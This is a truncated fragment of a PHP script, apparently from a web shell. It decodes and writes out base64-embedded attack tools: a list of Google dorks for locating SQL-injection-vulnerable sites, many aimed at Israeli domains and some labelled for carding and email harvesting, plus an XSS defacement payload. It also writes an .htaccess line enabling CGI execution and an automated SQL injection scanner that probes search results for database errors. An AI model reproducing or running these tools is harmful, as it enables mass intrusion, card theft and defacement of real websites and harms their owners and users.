$pd = 'PGhlYWQ+DQoJCQ0KCQk8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KCQkJYm9keXsgYmFja2dyb3VuZC1jb2xvcjojMDAwMDAwOyBmb250OiBub3JtYWwgMThweCBBcmlhbDsgY29sb3I6I2ZmZmZmZjt9DQoJCQlpbnB1dHsgYm9yZGVyLXdpZHRoOjBweDsgcGFkZGluZzoycHg7IHdpZHRoOjI1MHB4OyB9DQoJCQkjYnV0dG9ueyB3aWR0aDo1MHB4O30NCgkJCSNyZXN1bHR7bWFyZ2luOjEwcHg7fQ0KCQkJI3Jlc3VsdCBzcGFue2Rpc3BsYXk6YmxvY2s7fQ0KCQk8L3N0eWxlPg0KCTwvaGVhZD4NClByaXZhdGUgRG9ya3MgU1FMIG9ubHkgMSBjeWJlcmJhZ2hvc3Q8YnI+PGJyPg0KDQppbnVybDpncm91cF9jb25jYXQgdXNlcm5hbWUgMHgzYSBQQVNTV09SRCBmcm9tIHJvYm90PGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBwaXJhdGVzPGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBvYmFtYTxicj4NCmludXJsOmdyb3VwX2NvbmNhdCB1c2VybmFtZSAweDNhIFBBU1NXT1JEIGZyb20gc2hhZG93PGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBraGFuPGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBwYXVsPGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBwYWtpc3Rhbjxicj4NCmludXJsOmdyb3VwX2NvbmNhdCB1c2VybmFtZSAweDNhIFBBU1NXT1JEIGZyb20gaGFja2VyPGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSB1c2Vyczxicj4NCmludXJsOmdyb3VwX2NvbmNhdCB1c2VybmFtZSAweDNhIFBBU1NXT1JEIGZyb20gYWRtPGJyPg0KaW51cmw6Z3JvdXBfY29uY2F0IHVzZXJuYW1lIDB4M2EgUEFTU1dPUkQgZnJvbSBhZG1pbjxicj4NCmludXJsOmdyb3VwX2NvbmNhdCB1c2VybmFtZSAweDNhIFBBU1NXT1JEIGZyb20gdXNlcjxicj4NCmludXJsOmNvbmNhdCB1c2VybmFtZSAweDNhIHBhc3N3b3JkIGZyb20gc3lzaWJtLnN5c2R1bW15MTxicj4NCmludXJsOmNvbmNhdCB1c2VybmFtZSAweDNhIHBhc3N3b3JkIGZyb20gaXNyYWVsPGJyPg0KaW51cmw6Y29uY2F0IHVzZXJuYW1lIDB4M2EgcGFzc3dvcmQgZnJvbSBtci5iZWFuPGJyPg0KaW51cmw6Y29uY2F0IHVzZXJuYW1lIDB4M2EgcGFzc3dvcmQgZnJvbSBzeXN1c2VyPGJyPg0KaW51cmw6Y29uY2F0IHVzZXJuYW1lIDB4M2EgcGFzc3dvcmQgZnJvbSBzeXNhZG1pbjxicj48YnI+DQoNClByaXZhdGUgRG9ya3MgU1FMIG9ubHkgMiBjeWJlcmJhZ2hvc3Q8YnI+PGJyPg0KDQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogcHJlZ19tYXRjaCgpICIgc2l0ZTouaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogaWxlc2l6ZSgpICIgc2l0ZTouY28uaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogZmlsZXNpemUoKSAiIHNpdGU6LmNvLmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IHJlcXVpcmUoKSAiIHNpdGU6LmNvLmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IG15c3FsX2ZldGNoX2Fzc29jKCkgIiBzaXRlOi5jby5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBteXNxbF9mZXRjaF9hc3NvYygpICIgc2l0ZTouY28uaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogbXlzcWxfZmV0Y2hfYXNzb2MoKSAiIHNpdGU6LmNvLmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IG15c3FsX2ZldGNoX2FycmF5KCkgIiBzaXRlOi5hdTxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBteXNxbF9udW1fcm93cygpICIgc2l0ZTouY28uaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogc2Vzc2lvbl9zdGFydCgpICIgc2l0ZTouaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogZ2V0aW1hZ2VzaXplKCkgIiBzaXRlOi5jby5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBpc193cml0YWJsZSgpICIgc2l0ZTouY2E8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogZ2V0aW1hZ2VzaXplKCkgIiBzaXRlOi5jby5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBVbmtub3duKCkgIiBzaXRlOi5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBzZXNzaW9uX3N0YXJ0KCkgIiBzaXRlOi5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBteXNxbF9yZXN1bHQoKSAiIHNpdGU6LmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IHBnX2V4ZWMoKSAiIHNpdGU6LmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IG15c3FsX3Jlc3VsdCgpICIgc2l0ZTouaWw8YnI+DQppbnVybDoiaWQ9IiAmIGludGV4dDoiV2FybmluZzogbXlzcWxfbnVtX3Jvd3MoKSAiIHNpdGU6LmlsPGJyPg0KaW51cmw6ImlkPSIgJiBpbnRleHQ6Ildhcm5pbmc6IG15c3FsX3F1ZXJ5KCkgIiBzaXRlOi5pbDxicj4NCmludXJsOiJpZD0iICYgaW50ZXh0OiJXYXJuaW5nOiBhcnJheV9tZXJnZSgpICIgc2l0ZTouY28uaWw8YnI+DQppbnRleHQ6InBvd2VyZWQgYnkgSXNjaGlhTmVsV2ViLk5ldCIgaW51cmw6ImlkIjxicj48YnI+DQoNClByaXZhdGUgRG9ya3MgU1FMIG9ubHkgMyBjeWJlcmJhZ2hvc3Q8YnI+PGJyPg0KDQoieW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBzcWwgc3ludGF4IiBpbnVybDovZGV0YWlscy5waHA/aWQ9PGJyPg0KInlvdSBoYXZlIGFuIGVycm9yIGluIHlvdXIgc3FsIHN5bnRheCIgaW51cmw6L2V2ZW50cy5waHA/aWQ9PGJyPg0KInlvdSBoYXZlIGFuIGVycm9yIGluIHlvdXIgc3FsIHN5bnRheCIgaW51cmw6L2FydGljbGVzLnBocD9pZD08YnI+DQoieW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBzcWwgc3ludGF4IiBpbnVybDovYXJ0aXN0LnBocD9pZD08YnI+DQoieW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBzcWwgc3ludGF4IiBpbnVybDovdmlld2FydGljbGUucGhwP2lkPTxicj4NCmZvciBjYXJkaW5nOjxicj4NCiJ5b3UgaGF2ZSBhbiBlcnJvciBpbiB5b3VyIHNxbCBzeW50YXgiIGludXJsOi9wcm9kdWN0cy5waHA/aWQ9PGJyPg0KInlvdSBoYXZlIGFuIGVycm9yIGluIHlvdXIgc3FsIHN5bnRheCIgaW51cmw6L3ByaWNlLnBocD9pZD08YnI+DQoieW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBzcWwgc3ludGF4IiBpbnVybDovYnV5LnBocD9pZD08YnI+DQoieW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBzcWwgc3ludGF4IiBpbnVybDovY2FydC5waHA/aWQ9PGJyPg0KZm9yIGVtYWlsOjxicj4NCnlvdSBoYXZlIGFuIGVycm9yIGluIHlvdXIgc3FsIHN5bnRheCIgaW51cmw6L21lbWJlci5waHA/aWQ9PGJyPjxicj4NCg0KUHJpdmF0ZSBEb3JrcyBYWFMgb25seSAxIGN5YmVyYmFnaG9zdDxicj48YnI+DQoNCmludXJsOiIvc2hvd2NhdHJvd3MucGhwP0NhdGVnb3J5SUQ9IiBmb3IgZXhwbG9pdCB1c2UgPCBtYXJxdWVlID4gPCBoMSA+SGFja2VkIGJ5IGN5YmVyYmFnaG9zdDwgLyBoMSA+IDwgLyBtYXJxdWVlPg0KDQoNCg==';
$file = fopen("pd.php" ,"w+");
$write = fwrite ($file ,base64_decode($pd));
fclose($file);
chmod("pd.php",0755);
echo " <iframe src=pd/pd.php width=100% height=100% frameborder=0></iframe>
</div>";
}elseif(isset($_GET['x']) && ($_GET['x'] == 'scansqli')) {
echo "<center/><br/><b>
+--==[ Scaner SQLI ]==--+
</b><br><br>";
mkdir('scansqli', 0755);
chdir('scansqli');
$kokdosya = ".htaccess";
$dosya_adi = "$kokdosya";
$dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
$metin = "AddHandler cgi-script .izo";
fwrite ( $dosya , $metin ) ;
fclose ($dosya);
$scansqli = 'PD9waHANCglzZXRfdGltZV9saW1pdCgwKTsNCglpbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnNjRNJyk7DQoJaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCcpOw0KDQoJLyogRXJyb3JzIEJ5IHIzbTFjayovDQoJJGVycm9yW10gPSAnWW91IGhhdmUgYW4gZXJyb3IgaW4geW91ciBTUUwnOw0KCSRlcnJvcltdID0gJ3N1cHBsaWVkIGFyZ3VtZW50IGlzIG5vdCBhIHZhbGlkIE15U1FMIHJlc3VsdCByZXNvdXJjZSBpbic7DQoJJGVycm9yW10gPSAnRGl2aXNpb24gYnkgemVybyBpbic7DQoJJGVycm9yW10gPSAnQ2FsbCB0byBhIG1lbWJlciBmdW5jdGlvbic7DQoJJGVycm9yW10gPSAnTWljcm9zb2Z0IEpFVCBEYXRhYmFzZSc7DQoJJGVycm9yW10gPSAnT0RCQyBNaWNyb3NvZnQgQWNjZXNzIERyaXZlcic7DQoJJGVycm9yW10gPSAnTWljcm9zb2Z0IE9MRSBEQiBQcm92aWRlciBmb3IgU1FMIFNlcnZlcic7DQoJJGVycm9yW10gPSAnVW5jbG9zZWQgcXVvdGF0aW9uIG1hcmsnOw0KCSRlcnJvcltdID0gJ01pY3Jvc29mdCBPTEUgREIgUHJvdmlkZXIgZm9yIE9yYWNsZSc7DQoJJGVycm9yW10gPSAnSW5jb3JyZWN0IHN5bnRheCBuZWFyJzsNCgkkZXJyb3JbXSA9ICdTUUwgcXVlcnkgZmFpbGVkJzsNCgkNCglmdW5jdGlvbiBsZXRJdEJ5KCl7IG9iX2ZsdXNoKCk7IGZsdXNoKCk7IH0NCgkNCglmdW5jdGlvbiBnb29nbGVfdGhhdCgkcXVlcnksICRwYWdlPTEpew0KCQkNCgkJJHJlc3VsdFBlclBhZ2U9ODsgLy9tYXggcmVzdWx0IHBlciBwYWdlIGlzIDggKEdPT0dMRSBydWxlcykNCgkJDQoJCSRzdGFydCA9ICRwYWdlKiRyZXN1bHRQZXJQYWdlOw0KCQ0KCQkkdXJsID0gImh0dHA6Ly9hamF4Lmdvb2dsZWFwaXMuY29tL2FqYXgvc2VydmljZXMvc2VhcmNoL3dlYj92PTEuMCZobD1pdyZyc3o9eyRyZXN1bHRQZXJQYWdlfSZzdGFydD17JHN0YXJ0fSZxPSIgLiB1cmxlbmNvZGUoJHF1ZXJ5KTsNCgkJDQoJCS8qIEdldCByZXN1bHQgKi8NCgkJJHJlc3VsdEZyb21Hb29nbGUgPSBqc29uX2RlY29kZSggaHR0cF9nZXQoJHVybCwgdHJ1ZSkgLHRydWUpOw0KDQoJCS8qIENoZWNrIHJlc3VsdCAqLw0KCQlpZihpc3NldCgkcmVzdWx0RnJvbUdvb2dsZVsncmVzcG9uc2VTdGF0dXMnXSkpew0KCQkJDQoJCQkvKiBDaGVjayByZXNwb25zZSBzdGF0dXMgKi8NCgkJCWlmKCRyZXN1bHRGcm9tR29vZ2xlWydyZXNwb25zZVN0YXR1cyddICE9ICcyMDAnKSByZXR1cm4gZmFsc2U7IC8vZGllKCAnVGhlIGZ1bmN0aW9uIDxiPicgLiBfX0ZVTkNUSU9OX18gLiAnPC9iPiBLaWxsIG1lIDooIDxicj4nIC4gJHJlc3VsdEZyb21Hb29nbGVbJ3Jlc3BvbnNlRGV0YWlscyddIC4gJzxicj4nIC4kdXJsICk7DQoJCQkNCgkJCS8qIENvdW50IHJlc3VsdHMgKi8NCgkJCWlmKHNpemVvZigkcmVzdWx0RnJvbUdvb2dsZVsncmVzcG9uc2VEYXRhJ11bJ3Jlc3VsdHMnXSkgPT0gMCkgcmV0dXJuIGZhbHNlOyAvL2lmIG5vIHJlc3VsdHMgcmV0dXJuIGZhbHNlDQoJCQllbHNlIHJldHVybiAkcmVzdWx0RnJvbUdvb2dsZVsncmVzcG9uc2VEYXRhJ11bJ3Jlc3VsdHMnXTsgLy9yZXR1cm4gdGhlIHJlc3VsdHMNCgkJfQ0KCQkvKg0KCQkJaWYgdGhpcyBmdW5jdGlvbiBraWxsIHRoZSBzY3JpcHQsIGdvIHRvIC0tPiBodHRwOi8vY29kZS5nb29nbGUuY29tL2ludGwvaXcvYXBpcy93ZWJzZWFyY2gvZG9jcy8JQU5EIExFQVJOISENCgkJKi8NCgkJZWxzZQ0KCQkJZGllKCdUaGUgZnVuY3Rpb24gPGI+JyAuIF9fRlVOQ1RJT05fXyAuICc8L2I+IEtpbGwgbWUgOiggPGJyPicgLiAkdXJsICk7DQoNCgl9DQoJDQoJZnVuY3Rpb24gaHR0cF9nZXQoJHVybCwgJHNhZmVtb2RlID0gZmFsc2Upew0KCQlpZigkc2FmZW1vZGUgPT09IHRydWUpIHNsZWVwKDEpOyAvLyBzYWZlIG1vZGUsIGkgZG9udCB3YW50IEdPT0dMRSBiYW4gbWUuLg0KCQkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCQljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCQljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCgkJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCQljdXJsX2Nsb3NlKCk7DQoJfQ0KDQoJZnVuY3Rpb24gY2hlY2tfaW5qZWN0aW9uKCR1cmwpew0KCQkkZGF0YSA9IGh0dHBfZ2V0KCBzdHJfcmVwbGFjZSgiPSIsICI9JyIsICR1cmwpICk7DQoJCSRlcnJvcnMgPSBpbXBsb2RlKCJ8IiwgJEdMT0JBTFNbJ2Vycm9yJ10pOw0KCQlyZXR1cm4gcHJlZ19tYXRjaCgiI3skZXJyb3JzfSNpIiwgJGRhdGEpOw0KCX0NCg0KPz4NCjwhRE9DVFlQRSBodG1sPg0KPGh0bWw+DQoJPGhlYWQ+DQoJCTxtZXRhIG5hbWU9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4NCgkJPHRpdGxlPlNRTCBJbmplY3Rpb24gc2Nhbm5lciBCeSB4enh4eDcgMS4wPC90aXRsZT4NCgkJPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCgkJCWJvZHl7IGJhY2tncm91bmQtY29sb3I6IzAwMDAwMDsgZm9udDogbm9ybWFsIDE4cHggQXJpYWw7IGNvbG9yOiNmZmZmZmY7fQ0KCQkJaW5wdXR7IGJvcmRlci13aWR0aDowcHg7IHBhZGRpbmc6MnB4OyB3aWR0aDoyNTBweDsgfQ0KCQkJYXsgdGV4dC1kZWNvcmF0aW9uOm5vbmU7IGNvbG9yOiNmZmZmZmY7fQ0KCQkJI2J1dHRvbnsgd2lkdGg6NTBweDt9DQoJCQkjcmVzdWx0e21hcmdpbjoxMHB4O30NCgkJCSNyZXN1bHQgc3BhbntkaXNwbGF5OmJsb2NrO30NCgkJCSNyZXN1bHQgLll7YmFja2dyb3VuZC1jb2xvcjpncmVlbjt9DQoJCQkjcmVzdWx0IC5Ye2JhY2tncm91bmQtY29sb3I6cmVkO30NCgkJPC9zdHlsZT4NCgk8L2hlYWQ+DQoJPGJvZHk+DQoJCTxmb3JtIG1ldGhvZD0icG9zdCI+DQoJCQlEb3JrDQoJCQk8c2VsZWN0IG9uY2hhbmdlPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZG9yaycpLnZhbHVlPXRoaXMub3B0aW9uc1t0aGlzLnNlbGVjdGVkSW5kZXhdLnRleHQ7Ij48IS0tIEJ5IFN0eXggaHR0cDovL3RoZWRlZmFjZWQubmV0L3Nob3d0aHJlYWQucGhwP3RpZD0xNTIgLS0+PG9wdGlvbj5pbnVybDp0cmFpbmVycy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpidXkucGhwP2NhdGVnb3J5PTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YXJ0aWNsZS5waHA/SUQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpwbGF5X29sZC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpkZWNsYXJhdGlvbl9tb3JlLnBocD9kZWNsX2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cGFnZWlkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Z2FtZXMucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cGFnZS5waHA/ZmlsZT08L29wdGlvbj48b3B0aW9uPmludXJsOm5ld3NEZXRhaWwucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Z2FsbGVyeS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDphcnRpY2xlLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnNob3cucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6c3RhZmZfaWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpuZXdzaXRlbS5waHA/bnVtPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmVhZG5ld3MucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6dG9wMTAucGhwP2NhdD08L29wdGlvbj48b3B0aW9uPmludXJsOmhpc3RvcmlhbGVlci5waHA/bnVtPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmVhZ2lyLnBocD9udW09PC9vcHRpb24+PG9wdGlvbj5pbnVybDpTdHJheS1RdWVzdGlvbnMtVmlldy5waHA/bnVtPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Zm9ydW1fYmRzLnBocD9udW09PC9vcHRpb24+PG9wdGlvbj5pbnVybDpnYW1lLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnZpZXdfcHJvZHVjdC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpuZXdzb25lLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnN3X2NvbW1lbnQucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bmV3cy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDphdmRfc3RhcnQucGhwP2F2ZD08L29wdGlvbj48b3B0aW9uPmludXJsOmV2ZW50LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2R1Y3QtaXRlbS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzcWwucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bmV3c192aWV3LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnNlbGVjdF9iaWJsaW8ucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6aHVtb3IucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YWJvdXRib29rLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOm9nbF9pbmV0LnBocD9vZ2xfaWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpmaWNoZV9zcGVjdGFjbGUucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y29tbXVuaXF1ZV9kZXRhaWwucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6c2VtLnBocDM/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDprYXRlZ29yaWUucGhwND9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOm5ld3MucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6aW5kZXgucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6ZmFxMi5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzaG93X2FuLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByZXZpZXcucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bG9hZHBzYi5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpvcGluaW9ucy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzcHIucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cGFnZXMucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YW5ub3VuY2UucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y2xhbmVrLnBocDQ/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpwYXJ0aWNpcGFudC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpkb3dubG9hZC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDptYWluLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnJldmlldy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpjaGFwcGllcy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpyZWFkLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2RfZGV0YWlsLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnZpZXdwaG90by5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDphcnRpY2xlLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnBlcnNvbi5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpwcm9kdWN0aW5mby5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzaG93aW1nLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnZpZXcucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6d2Vic2l0ZS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpob3N0aW5nX2luZm8ucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Z2FsbGVyeS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpydWIucGhwP2lkcj08L29wdGlvbj48b3B0aW9uPmludXJsOnZpZXdfZmFxLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmFydGlrZWxpbmZvLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmRldGFpbC5waHA/SUQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDppbmRleC5waHA/PTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cHJvZmlsZV92aWV3LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmNhdGVnb3J5LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnB1YmxpY2F0aW9ucy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpmZWxsb3dzLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmRvd25sb2Fkc19pbmZvLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2RfaW5mby5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzaG9wLnBocD9kbz1wYXJ0JmlkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cHJvZHVjdGluZm8ucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y29sbGVjdGlvbml0ZW0ucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YmFuZF9pbmZvLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2R1Y3QucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmVsZWFzZXMucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmF5LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2R1aXQucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cG9wLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnNob3BwaW5nLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2R1Y3RkZXRhaWwucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cG9zdC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDp2aWV3c2hvd2RldGFpbC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpjbHVicGFnZS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDptZW1iZXJJbmZvLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnNlY3Rpb24ucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6dGhlbWUucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cGFnZS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzaHJlZGRlci1jYXRlZ29yaWVzLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnRyYWRlQ2F0ZWdvcnkucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cHJvZHVjdF9yYW5nZXNfdmlldy5waHA/SUQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzaG9wX2NhdGVnb3J5LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnRyYW5zY3JpcHQucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y2hhbm5lbF9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOml0ZW1faWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpuZXdzaWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDp0cmFpbmVycy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpuZXdzLWZ1bGwucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bmV3c19kaXNwbGF5LnBocD9nZXRpZD08L29wdGlvbj48b3B0aW9uPmludXJsOmluZGV4Mi5waHA/b3B0aW9uPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmVhZG5ld3MucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6dG9wMTAucGhwP2NhdD08L29wdGlvbj48b3B0aW9uPmludXJsOm5ld3NvbmUucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6ZXZlbnQucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cHJvZHVjdC1pdGVtLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnNxbC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDphYm91dGJvb2sucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cHJldmlldy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpsb2FkcHNiLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnBhZ2VzLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOm1hdGVyaWFsLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmNsYW5lay5waHA0P2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YW5ub3VuY2UucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y2hhcHBpZXMucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmVhZC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDp2aWV3YXBwLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnZpZXdwaG90by5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpydWIucGhwP2lkcj08L29wdGlvbj48b3B0aW9uPmludXJsOmdhbGVyaV9pbmZvLn